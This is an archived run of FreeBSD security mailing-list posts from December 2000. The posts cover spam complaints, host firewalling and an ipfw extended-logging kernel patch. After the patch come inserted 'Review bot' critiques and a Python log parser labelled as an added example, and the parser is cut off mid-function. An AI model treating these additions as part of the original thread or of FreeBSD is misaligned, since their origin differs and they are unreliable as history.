You can complain to Bizland's ISP, however, given the large volume and multiple incidents this ISP has not responded to it is likely they have a "pink contract" which permits the spam to continue. Bizland's ISP is Exodus, not known for AUP enforcement. The only real way to filter this spam, assuming you don't subscribe to ORBS (a cure which can sometimes be worse than the disease) is to add these domains (and netblocks) to your local sendmail/procmail/... filters. Roger Marquis To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 13:33:49 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 13:33:47 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id CC4C337B402 for ; Wed, 13 Dec 2000 13:33:45 -0800 (PST) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id OAA15916; Wed, 13 Dec 2000 14:33:23 -0700 (MST) Message-Id: <4.3.2.7.2.20001213143102.00e2d4d0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 13 Dec 2000 14:33:19 -0700 To: Rob Simmons From: Brett Glass Subject: Re: Get that spammer! (Was: professional art community) Cc: security@FreeBSD.ORG In-Reply-To: References: <4.3.2.7.2.20001213135715.00b82760@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 02:25 PM 12/13/2000, Rob Simmons wrote: >The origin of this particular piece of spam is owned by @home.com so >mainly send complaints to abuse@home.com Actually, @home.com in Canada isn't that simple.... It seems to be a franchise that's split up between different providers by city or province. When you see on.home.com in the domain, it's really rogerswave.ca. 
I don't know whether Julian's complaint script handles that.... I added it to mine about two months ago. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 13:36:51 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 13:36:48 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail.cstone.net (mail.cstone.net [209.145.64.80]) by hub.freebsd.org (Postfix) with ESMTP id 6955137B69D for ; Wed, 13 Dec 2000 13:36:44 -0800 (PST) Received: from cstone.net (aylee.mrgoodbucks.com [209.145.93.143]) by mail.cstone.net (8.11.1/8.11.1) with ESMTP id eBDLYmu01026; Wed, 13 Dec 2000 16:34:48 -0500 (EST) Message-ID: <3A37EC6B.7033AF50@cstone.net> Date: Wed, 13 Dec 2000 16:38:51 -0500 From: Sean Michael Whipkey X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Get that spammer! (Was: professional art community) References: <4.3.2.7.2.20001213135715.00b82760@localhost> <4.3.2.7.2.20001213143102.00e2d4d0@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett Glass wrote: > Actually, @home.com in Canada isn't that simple.... It seems to be > a franchise that's split up between different providers by city or > province. When you see on.home.com in the domain, it's really > rogerswave.ca. I don't know whether Julian's complaint script handles > that.... I added it to mine about two months ago. When I used the abuse.net address (home.com@abuse.net) for the IP address, it forwarded it on to rogerswave.ca no problem. SeanMike -- SeanMike Whipkey - "The Man. The goatee. The reputation." - Kimmet "What the hell is wrong with that boy?!?" - Adrienne Uphoff "What the French lack in reason they make up for in sheer gall." 
- Onion "Did anyone else read this and think of SeanMike?" - Leybourne To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 13:59:44 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 13:59:42 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id A86FE37B400 for ; Wed, 13 Dec 2000 13:59:41 -0800 (PST) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id OAA16277; Wed, 13 Dec 2000 14:59:24 -0700 (MST) Message-Id: <4.3.2.7.2.20001213145744.047c9250@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 13 Dec 2000 14:59:19 -0700 To: Roger Marquis , security@FreeBSD.ORG From: Brett Glass Subject: Re: Get that spammer! (bizland-inc.com) In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 02:33 PM 12/13/2000, Roger Marquis wrote: >You can complain to Bizland's ISP, however, given the large volume >and multiple incidents this ISP has not responded to it is likely >they have a "pink contract" which permits the spam to continue. > >Bizland's ISP is Exodus, not known for AUP enforcement. Yes. Exodus is the new AGIS. They should be treated to the same shunning within the ISP community that was previously reserved for the network that hosted "Spamford" Wallace. --Brett Glass "He has a memory like an effluent." 
--Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 19:44:11 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 19:44:09 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from digitalinet.com (digitalinet.com [216.65.124.130]) by hub.freebsd.org (Postfix) with SMTP id BEE6137B400 for ; Wed, 13 Dec 2000 19:44:09 -0800 (PST) Received: (qmail 87021 invoked from network); 14 Dec 2000 03:46:47 -0000 Received: from unknown (HELO john) (24.26.71.56) by digitalinet.com with SMTP; 14 Dec 2000 03:46:47 -0000 Message-ID: <001301c06580$5ead2a40$03030303@john> From: "John" To: Subject: unsubscribe freebsd-security Date: Wed, 13 Dec 2000 22:45:57 -0500 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0010_01C06556.7561A420" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0010_01C06556.7561A420 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable unsubscribe freebsd-security ------=_NextPart_000_0010_01C06556.7561A420 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable


------=_NextPart_000_0010_01C06556.7561A420-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 22:10:28 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 22:10:24 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 110E637B400 for ; Wed, 13 Dec 2000 22:10:24 -0800 (PST) Received: from bsdie.rwsystems.net([209.197.223.2]) (2878 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Thu, 14 Dec 2000 00:09:55 -0600 (CST) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Thu, 14 Dec 2000 00:09:54 -0600 (CST) 
From: James Wyatt To: Terry Zink Cc: freebsd-security@FreeBSD.ORG Subject: Re: 911 lockdown! In-Reply-To: <5.0.0.25.0.20001213132136.00a2c7b0@mail.metrocon.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Uh, service access can easily be controlled with ipfw, tcp-wrappers, or ipfilter. Ssh has the sshd_config file as well. These tools and others in its arsenal make FreeBSD an excellent bastion host OS. (But we all know that here, right? (^_^)

Firewalls are to prevent harm to hosts (incl. workgroups) that can not always be trusted or even hardened enough to let remain unprotected. Groups of boxes running SMB/Sun RPCs (ala Windows file shares, NFS, NIS, etc...), applications with weak authentication (open POP3, rsh, etc...), or old versions (ancient sendmail, some wuftpds, etc...) are easier to put behind a firewall than make secure enough to allow "in public".

A single FreeBSD host with an admin who watches alerts does not need an extra point of failure between it and The Net or the cost and overhead of an extra firewall. For several of my smaller customers, it *is* the firewall as well as the application server.

If your users are all using POP and telnet on the local net, cool, but what do you do when they *need* ssh or telnet from "anywhere" and pick a dumb password? Nothing technical can fix that. If they don't need anything but the local LAN, FreeBSD's access controls are as good as any firewall. Or have I had too much to think tonight? - Jy@

On Wed, 13 Dec 2000, Terry Zink wrote:

> Rather easily. If the outsider cannot get into the proper services (ssh
> most likely) to log in, then he can't crack.
>
> Most crackers use telnet, or pop. But if he finds the pop pass he can't do
> much if telnet and ssh are closed to all but the internal network.
[ ... ]
> At 10:09 AM 12/13/00 -0700, Brett the Glass wrote:
> >Pardon me if I'm missing something here, but how would a firewall
> >prevent someone from cracking a guessable password on a legitimate
> >user account?
> >At 09:18 AM 12/13/2000, Robert McCallum wrote:
> > >My DNS/MAIL/WEB server was hacked recently, I don't believe they 'rooted'
> > >the server 'yet'. But I do see that they have obtained access to a user
> > >account. It appears they cracked a users account which I found out that one
> > >of my users did not adhere to our security policy and set a password that
> > >was not in accordance to our password policy.
[ ... ]
> > >In conclusion, I need to setup a firewall on that particular host ASAP.

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Dec 14 0: 4:30 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 00:04:27 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from elvis.mu.org (elvis.mu.org [207.154.226.10]) by hub.freebsd.org (Postfix) with ESMTP id BACC237B402 for ; Thu, 14 Dec 2000 00:04:27 -0800 (PST) Received: by elvis.mu.org (Postfix, from userid 1098) id 293032B210; Thu, 14 Dec 2000 02:04:27 -0600 (CST) Date: Thu, 14 Dec 2000 02:04:27 -0600
From: Bill Fumerola To: Wes Peters Cc: jucnik@ew.sk, freebsd-security@freebsd.org Subject: Re: Interface Message-ID: <20001214020426.N72273@elvis.mu.org> References: <3A362FFB.4000@ew.sk> <3A3659F8.B7C1F990@softweyr.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3A3659F8.B7C1F990@softweyr.com>; from wes@softweyr.com on Tue, Dec 12, 2000 at 10:01:44AM -0700 X-Operating-System: FreeBSD 4.2-FEARSOME-20001103 i386 Sender: billf@elvis.mu.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Tue, Dec 12, 2000 at 10:01:44AM -0700, Wes Peters wrote:

> jucnik@ew.sk wrote:
> > I know this is off-topic, but does anybody know, why in include file
> > is so many errors (defined struct: aaa struct sockaddr bbb
> > instead of aaa struct sockaddr *bbb) ?
> >
> > i can't compile my progs without this functional...
>
> has no errors in it. Your program has an error, not including
> the other include files that needs. Locate the structures that
> are not defined in the include files and #include those before .
> Repeat until the errors go away.
>
> Or, poke through the system sources for another source file that includes
> and duplicate its list of include files.

man inet

--
Bill Fumerola - security yahoo / Yahoo! inc.
- fumerola@yahoo-inc.com / billf@FreeBSD.org

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Dec 14 0:32:36 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 00:32:28 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id AD25837B400 for ; Thu, 14 Dec 2000 00:32:28 -0800 (PST) Received: from rfx-64-6-211-1.users.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Thu, 14 Dec 2000 00:30:44 -0800 Received: (from cjc@localhost) by rfx-64-6-211-1.users.reflexcom.com (8.11.0/8.11.0) id eBE8WJd35805 for freebsd-security@freebsd.org; Thu, 14 Dec 2000 00:32:19 -0800 (PST) (envelope-from cjc) Date: Thu, 14 Dec 2000 00:32:19 -0800
From: "Crist J. Clark"
To: freebsd-security@freebsd.org
Subject: Extended ipfw Logging
Message-ID: <20001214003219.K96105@149.211.6.64.reflexcom.com>
Reply-To: cjclark@alum.mit.edu
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="ZmUaFz6apKcXQszQ"
X-Mailer: Mutt 1.0i
Sender: cjc@rfx-64-6-211-1.users.reflexcom.com
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

--ZmUaFz6apKcXQszQ
Content-Type: text/plain; charset=us-ascii

I posted this to the freebsd-ipfw list, but thought some of those in
this group who do not follow that list might be interested too.

INTRODUCTION

I wanted to add some detail to the ipfw logging. Specifically, I
wanted TCP flags. However, once I started coding, I decided why not
toss just about every field of interest in. I have attached patches.

WHAT THE PATCHES DO

There are new fields for all packets. Data from the IP header, the IP
ID, TTL, and extra fragmentation information is printed for all types
of datagrams. TCP packets include additional information on sequence
number, acknowledgement number, and flags. Here are examples.
First, a TCP handshake, brief data exchange, and close (a telnet to
the echo port),

  ipfw: 400 Accept TCP 192.168.64.254:2932 192.168.64.20:7 f=0x02 s=0x7feef91d a=0x00000000 i=0x48a9 t=0x40 in via ep0 DF
  ipfw: 400 Accept TCP 192.168.64.20:7 192.168.64.254:2932 f=0x12 s=0xeaa736a6 a=0x7feef91e i=0x0080 t=0x40 out via ep0 DF
  ipfw: 400 Accept TCP 192.168.64.254:2932 192.168.64.20:7 f=0x10 s=0x7feef91e a=0xeaa736a7 i=0x48aa t=0x40 in via ep0 DF
  ipfw: 400 Accept TCP 192.168.64.254:2932 192.168.64.20:7 f=0x18 s=0x7feef91e a=0xeaa736a7 i=0x48ca t=0x40 in via ep0 DF
  ipfw: 400 Accept TCP 192.168.64.20:7 192.168.64.254:2932 f=0x18 s=0xeaa736a7 a=0x7feef925 i=0x0083 t=0x40 out via ep0 DF
  ipfw: 400 Accept TCP 192.168.64.254:2932 192.168.64.20:7 f=0x10 s=0x7feef925 a=0xeaa736ae i=0x48cb t=0x40 in via ep0 DF
  ipfw: 400 Accept TCP 192.168.64.254:2932 192.168.64.20:7 f=0x11 s=0x7feef925 a=0xeaa736ae i=0x48ee t=0x40 in via ep0 DF
  ipfw: 400 Accept TCP 192.168.64.20:7 192.168.64.254:2932 f=0x10 s=0xeaa736ae a=0x7feef926 i=0x0086 t=0x40 out via ep0 DF
  ipfw: 400 Accept TCP 192.168.64.20:7 192.168.64.254:2932 f=0x11 s=0xeaa736ae a=0x7feef926 i=0x0087 t=0x40 out via ep0 DF
  ipfw: 400 Accept TCP 192.168.64.254:2932 192.168.64.20:7 f=0x10 s=0x7feef926 a=0xeaa736af i=0x48f0 t=0x40 in via ep0 DF

Here is UDP (a timed update),

  ipfw: 400 Accept UDP 192.168.64.254:525 192.168.64.20:525 i=0x4bb8 t=0x40 in via ep0
  ipfw: 400 Accept UDP 192.168.64.20:525 192.168.64.254:525 i=0x008b t=0x40 out via ep0
  ipfw: 400 Accept UDP 192.168.64.254:525 192.168.64.255:525 i=0x4bb9 t=0x40 in via ep

And finally, some fragmentation and ICMP (an oversized ping),

  ipfw: 400 Accept ICMP:8.0 192.168.64.254 192.168.64.20 i=0x5038 t=0xff in via ep0 Frag=0+
  ipfw: 400 Accept ICMP 192.168.64.254 192.168.64.20 i=0x5038 t=0xff in via ep0 Frag=1480+
  ipfw: 400 Accept ICMP 192.168.64.254 192.168.64.20 i=0x5038 t=0xff in via ep0 Frag=2960
  ipfw: 400 Accept ICMP:0.0 192.168.64.20 192.168.64.254 i=0x0095 t=0xff out via ep0

There are
more fields that could be done, but this is all I was interested in
doing when coding.

HOW TO INSTALL AND CONTROL

Simply use patch(1) to apply the attached patches to your kernel
source. The patches were made and tested on 5-CURRENT, but they will
apply cleanly to 4-STABLE and I don't see why they would function any
differently. To enable the patches in your kernel, add,

  options IPFIREWALL_EXTRA_VERBOSE

To your kernel config. The patches use the net.inet.ip.fw.verbose
sysctl knob,

  net.inet.ip.fw.verbose=0 # No logging
  net.inet.ip.fw.verbose=1 # Standard logging
  net.inet.ip.fw.verbose=2 # Enhanced logging

So once compiled in, the changes can be switched on the fly. When the
kernel is compiled with IPFIREWALL_EXTRA_VERBOSE, the verbose level of
'2' is the default after reboot.

SECURITY AND PERFORMANCE ISSUES

I was questioned whether this might make a firewall box easier to
DoS. I do not think there is any significant threat above that of a
box with standard logging. If you have a look at the patches, there is
not a whole lot of new code (although we are making snprintf(3)
calls). If you already have logging running, I doubt the change in
performance would be noticeable.

Another point someone brought up was whether this might overflow logs
because you will not be getting 'last message repeated' lines from
syslogd. Since the IP ID and other fields should be changing for every
packet, you will not be seeing those. This might start to fill up logs
more if you are having misconfiguration problems, but I do not think
it makes the box easier to attack. It is trivial for an attacker to
mix things up so that you will not get 'last message repeated'
lines. Take something like a Smurf for example. You would be getting
pounded from multiple source addresses.

To summarize, if you want more information in your logs, these patches
should give you more of what you want with little to no cost. If
anyone has suggestions, bugs, criticism, or praise, send it along.
Obviously, if it is something that you think others on the list might
wish to discuss, CC the list. Otherwise, feel free to send mail
directly to me.

LOGGING AND CAPTURE DAEMON

Another thing I was considering was the idea of making a more
configurable logging utility and possibly a utility that will even
capture packets. The magic of divert(4) sockets makes it fairly
straightforward to do these things in userland where you can add new
abilities without worrying about bloating or breaking the kernel. This
is similar to how some other firewall tools work.

In addition to more configurable and expandable logging, I was
considering the capability to capture raw packets. Now, I really do
not think trying to build something like a fully loaded IDS from this
is worthwhile when you have great tools like Snort available, but I
think its usefulness for debugging a firewall would be reason enough
and any actual security uses people find would be great.

I have not really decided if I am going to do this. If no one else is
interested, I think I am best off just customizing my FreeBSD kernel
code as needed or making a really basic (not necessarily user friendly
or well documented) userland logger.

Thanks. Have fun with the patches and please let me know if you are
using them.
--
Crist J. Clark cjclark@alum.mit.edu

--ZmUaFz6apKcXQszQ
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="ip_fw.patch"

--- ip_fw.c Sun Dec 10 19:13:17 2000 +++ /usr/src/sys/netinet/ip_fw.c Wed Dec 13 23:52:04 2000 @@ -67,7 +67,11 @@ static int fw_debug = 1; #ifdef IPFIREWALL_VERBOSE +#ifdef IPFIREWALL_EXTRA_VERBOSE +static int fw_verbose = 2; +#else static int fw_verbose = 1; +#endif #else static int fw_verbose = 0; #endif
@@ -488,7 +492,7 @@ struct icmp *const icmp = (struct icmp *) ((u_int32_t *) ip + ip->ip_hl); u_int64_t count; char *action; - char action2[32], proto[47], name[18], fragment[17]; + char action2[32], proto[97], name[18], fragment[17]; int len; count = f ? f->fw_pcnt : ++counter; @@ -572,9 +576,18 @@ len += snprintf(SNPARGS(proto, len), " "); len += snprintf(SNPARGS(proto, len), "%s", inet_ntoa(ip->ip_dst)); - if ((ip->ip_off & IP_OFFMASK) == 0) - snprintf(SNPARGS(proto, len), ":%d", + if ((ip->ip_off & IP_OFFMASK) == 0) { + len += snprintf(SNPARGS(proto, len), ":%d", ntohs(tcp->th_dport)); +#ifdef IPFIREWALL_EXTRA_VERBOSE + if ( fw_verbose > 1 ) + len += snprintf(SNPARGS(proto, len), + " f=0x%02x s=0x%08x a=0x%08x", + tcp->th_flags, + ntohl(tcp->th_seq), + ntohl(tcp->th_ack)); +#endif + } break; case IPPROTO_UDP: len = snprintf(SNPARGS(proto, 0), "UDP %s", @@ -587,7 +600,7 @@ len += snprintf(SNPARGS(proto, len), "%s", inet_ntoa(ip->ip_dst)); if ((ip->ip_off & IP_OFFMASK) == 0) - snprintf(SNPARGS(proto, len), ":%d", + len += snprintf(SNPARGS(proto, len), ":%d", ntohs(udp->uh_dport)); break; case IPPROTO_ICMP: 
@@ -598,20 +611,46 @@ len = snprintf(SNPARGS(proto, 0), "ICMP "); len += snprintf(SNPARGS(proto, len), "%s", inet_ntoa(ip->ip_src)); - snprintf(SNPARGS(proto, len), " %s", inet_ntoa(ip->ip_dst)); + len += snprintf(SNPARGS(proto, len), " %s", inet_ntoa(ip->ip_dst)); break; default: len = snprintf(SNPARGS(proto, 0), "P:%d %s", ip->ip_p, inet_ntoa(ip->ip_src)); - snprintf(SNPARGS(proto, len), " %s", inet_ntoa(ip->ip_dst)); + len += snprintf(SNPARGS(proto, len), " %s", inet_ntoa(ip->ip_dst)); break; } - if ((ip->ip_off & IP_OFFMASK)) +#ifdef IPFIREWALL_EXTRA_VERBOSE + if ( fw_verbose > 1 ) { + snprintf(SNPARGS(proto, len), + " i=0x%04x t=0x%02x", + ntohs(ip->ip_id), + ip->ip_ttl); + if (ip->ip_off & IP_DF) + len = snprintf(SNPARGS(fragment, 0), " DF"); + else { + fragment[0] = '\0'; + len = 0; + } + if (ip->ip_off & (IP_OFFMASK | IP_MF)) + len += snprintf(SNPARGS(fragment, len), " Frag=%d", + (ip->ip_off & IP_OFFMASK)<<3); + if (ip->ip_off & IP_MF) + len += snprintf(SNPARGS(fragment, len), "+"); + } else { + if (ip->ip_off & (IP_OFFMASK | IP_MF)) + snprintf(SNPARGS(fragment, 0), " Fragment = %d", + ip->ip_off & IP_OFFMASK); + else + fragment[0] = '\0'; + } +#else + if (ip->ip_off & (IP_OFFMASK | IP_MF)) snprintf(SNPARGS(fragment, 0), " Fragment = %d", ip->ip_off & IP_OFFMASK); else fragment[0] = '\0'; +#endif if (oif) log(LOG_SECURITY | LOG_INFO, "%s %s %s out via %s%d%s\n", name, action, proto, oif->if_name, oif->if_unit, fragment); --ZmUaFz6apKcXQszQ Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="options.patch" --- options Sun Dec 10 18:25:56 2000 +++ /usr/src/sys/conf/options Sun Dec 10 01:45:19 2000 
@@ -245,6 +245,7 @@ PFIL_HOOKS opt_pfil_hooks.h IPFIREWALL opt_ipfw.h IPFIREWALL_VERBOSE opt_ipfw.h +IPFIREWALL_EXTRA_VERBOSE opt_ipfw.h IPFIREWALL_VERBOSE_LIMIT opt_ipfw.h IPFIREWALL_DEFAULT_TO_ACCEPT opt_ipfw.h IPFIREWALL_FORWARD opt_ipfw.h --ZmUaFz6apKcXQszQ-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 1: 6:27 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 01:06:25 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from genius.tao.org.uk (genesis.tao.org.uk [194.242.131.94]) by hub.freebsd.org (Postfix) with ESMTP id 4131E37B400; Thu, 14 Dec 2000 01:06:24 -0800 (PST) Received: by genius.tao.org.uk (Postfix, from userid 100) id 5D2879B38; Thu, 14 Dec 2000 09:06:33 +0000 (GMT) Date: Thu, 14 Dec 2000 09:06:33 +0000 
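Review bot: In the ip_fw.c hunk at @@ -67,7 +67,11 @@ the new "#ifdef IPFIREWALL_EXTRA_VERBOSE" is nested inside "#ifdef IPFIREWALL_VERBOSE", so a kernel configured with only "options IPFIREWALL_EXTRA_VERBOSE" still falls through to "static int fw_verbose = 0;", while the install text asks for that one option alone. Either state that IPFIREWALL_VERBOSE is required as well, or move the new test outside the existing block so the option implies verbose logging. Making 2 the boot default also changes what existing log consumers see; leaving the default at 1 and letting the sysctl opt in to level 2 would be less surprising.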
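Review bot: In the ip_fw.c hunk at @@ -488,7 +492,7 @@ the new size in "char action2[32], proto[97], name[18], fragment[17];" is an unexplained constant. Counting from the sample output, the longest TCP entry (two dotted quads with five-digit ports plus the f=, s=, a=, i= and t= fields) comes to 96 characters, so 97 is an exact fit with no room for one more field. Add a comment showing how the number was derived, or build it from the sizes of the pieces, so the next field someone adds does not quietly run out of space.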
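Review bot: In the TCP case of the ip_fw.c hunk at @@ -572,9 +576,18 @@ the added block reads tcp->th_flags, tcp->th_seq and tcp->th_ack whenever the fragment offset is zero, but nothing visible here shows that the packet is known to be long enough to hold the TCP header that far; the old code only touched th_dport. Please confirm the caller guarantees a complete TCP header in a first fragment, or add a length check before printing these fields. Style: "if ( fw_verbose > 1 )" puts spaces inside the parentheses, unlike the surrounding "if ((ip->ip_off & IP_OFFMASK) == 0)".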
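Review bot: At the end of the ip_fw.c hunk at @@ -598,20 +611,46 @@ the fragment test changes from "(ip->ip_off & IP_OFFMASK)" to "ip->ip_off & (IP_OFFMASK | IP_MF)" in the #else and level-1 paths as well, so standard logging now prints " Fragment = 0" for first fragments, which it did not do before; that change for kernels built without the new option should be mentioned in the description or left out. The level-2 path prints "(ip->ip_off & IP_OFFMASK)<<3" while the other paths print the unshifted value, so the same fragment is reported with different numbers depending on the sysctl; say so where the log format is documented. The level-1 else branch also repeats the #else branch line for line and could share it.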
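Review bot: options.patch adds "IPFIREWALL_EXTRA_VERBOSE opt_ipfw.h" to the options file, but the patch set carries no documentation for it: there is no description of the option for people writing a kernel config and no text explaining that net.inet.ip.fw.verbose now accepts 2 or what the f=, s=, a=, i=, t= and Frag= fields mean. The explanation currently lives only in the e-mail; a short entry beside the other IPFIREWALL_* options and a paragraph in the ipfw manual page should go in with the code.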
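The following is an added example, not part of Crist J. Clark's post or of FreeBSD: a Python parser for the level-2 log format shown in his message, which uses the new fields to follow a TCP handshake by flags and sequence numbers and to tie fragments together by IP ID. The regular expression is inferred from the sample lines in the post, and all function and field names are hypothetical.

```python
import re
from collections import defaultdict

# Log lines copied from the examples in the post (verbose level 2 output).
SAMPLE = """\
ipfw: 400 Accept TCP 192.168.64.254:2932 192.168.64.20:7 f=0x02 s=0x7feef91d a=0x00000000 i=0x48a9 t=0x40 in via ep0 DF
ipfw: 400 Accept TCP 192.168.64.20:7 192.168.64.254:2932 f=0x12 s=0xeaa736a6 a=0x7feef91e i=0x0080 t=0x40 out via ep0 DF
ipfw: 400 Accept TCP 192.168.64.254:2932 192.168.64.20:7 f=0x10 s=0x7feef91e a=0xeaa736a7 i=0x48aa t=0x40 in via ep0 DF
ipfw: 400 Accept UDP 192.168.64.254:525 192.168.64.20:525 i=0x4bb8 t=0x40 in via ep0
ipfw: 400 Accept ICMP:8.0 192.168.64.254 192.168.64.20 i=0x5038 t=0xff in via ep0 Frag=0+
ipfw: 400 Accept ICMP 192.168.64.254 192.168.64.20 i=0x5038 t=0xff in via ep0 Frag=1480+
ipfw: 400 Accept ICMP 192.168.64.254 192.168.64.20 i=0x5038 t=0xff in via ep0 Frag=2960
"""

# Bits of the TCP flags byte printed as f=, low bit first.
TCP_FLAGS = ((0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"),
             (0x08, "PSH"), (0x10, "ACK"), (0x20, "URG"))
FIELD_NAMES = {"f": "tcp_flags", "s": "seq", "a": "ack", "i": "ip_id", "t": "ttl"}
MASK32 = 0xFFFFFFFF

# Assumed layout, inferred from the samples; a syslog prefix before "ipfw:" is tolerated.
LINE_RE = re.compile(
    r"ipfw: (?P<rule>\d+) (?P<action>.+?) "
    r"(?P<proto>TCP|UDP|ICMP|P:\d+)(?::(?P<icmp>\d+\.\d+))? "
    r"(?P<src>\d+(?:\.\d+){3})(?::(?P<sport>\d+))? "
    r"(?P<dst>\d+(?:\.\d+){3})(?::(?P<dport>\d+))?"
    r"(?P<fields>(?: [fsait]=0x[0-9a-fA-F]+)*)"
    r" (?P<dir>in|out) via (?P<ifname>\S+)(?P<tail>.*)$")
FIELD_RE = re.compile(r" ([fsait])=0x([0-9a-fA-F]+)")
FRAG_RE = re.compile(r"Frag=(\d+)(\+?)")


def parse_line(line):
    """Return a dict for one ipfw log line, or None if the line is not one."""
    m = LINE_RE.search(line.rstrip("\n"))
    if m is None:
        return None
    rec = m.groupdict()
    rec["rule"] = int(rec["rule"])
    for key in ("sport", "dport"):
        rec[key] = int(rec[key]) if rec[key] else None
    for letter, value in FIELD_RE.findall(rec.pop("fields")):
        rec[FIELD_NAMES[letter]] = int(value, 16)
    tail = rec.pop("tail")
    frag = FRAG_RE.search(tail)
    rec["df"] = "DF" in tail.split()
    rec["frag_offset"] = int(frag.group(1)) if frag else None  # as printed after Frag=
    rec["more_frags"] = bool(frag and frag.group(2))           # trailing "+"
    rec["flag_names"] = [n for bit, n in TCP_FLAGS if rec.get("tcp_flags", 0) & bit]
    return rec


def parse_log(text):
    return [r for r in map(parse_line, text.splitlines()) if r is not None]


def track_handshakes(records):
    """Follow SYN, SYN+ACK, ACK using the logged seq/ack numbers.
    Returns {(client, cport, server, sport): state}; "syn" means never completed."""
    conns = {}
    for r in records:
        if r["proto"] != "TCP" or "tcp_flags" not in r:
            continue
        fwd = (r["src"], r["sport"], r["dst"], r["dport"])
        rev = (r["dst"], r["dport"], r["src"], r["sport"])
        flags = r["tcp_flags"] & 0x17  # FIN | SYN | RST | ACK
        if flags == 0x02:
            conns[fwd] = {"state": "syn", "isn": r["seq"]}
        elif flags == 0x12 and rev in conns and r["ack"] == (conns[rev]["isn"] + 1) & MASK32:
            conns[rev].update(state="syn+ack", server_isn=r["seq"])
        elif (flags == 0x10 and fwd in conns and conns[fwd]["state"] == "syn+ack"
              and r["ack"] == (conns[fwd]["server_isn"] + 1) & MASK32):
            conns[fwd]["state"] = "established"
    return {key: c["state"] for key, c in conns.items()}


def fragment_trains(records):
    """Group fragments by (src, dst, IP ID). Later fragments carry no ports or
    ICMP type in the log, so the IP ID is the only field that links them."""
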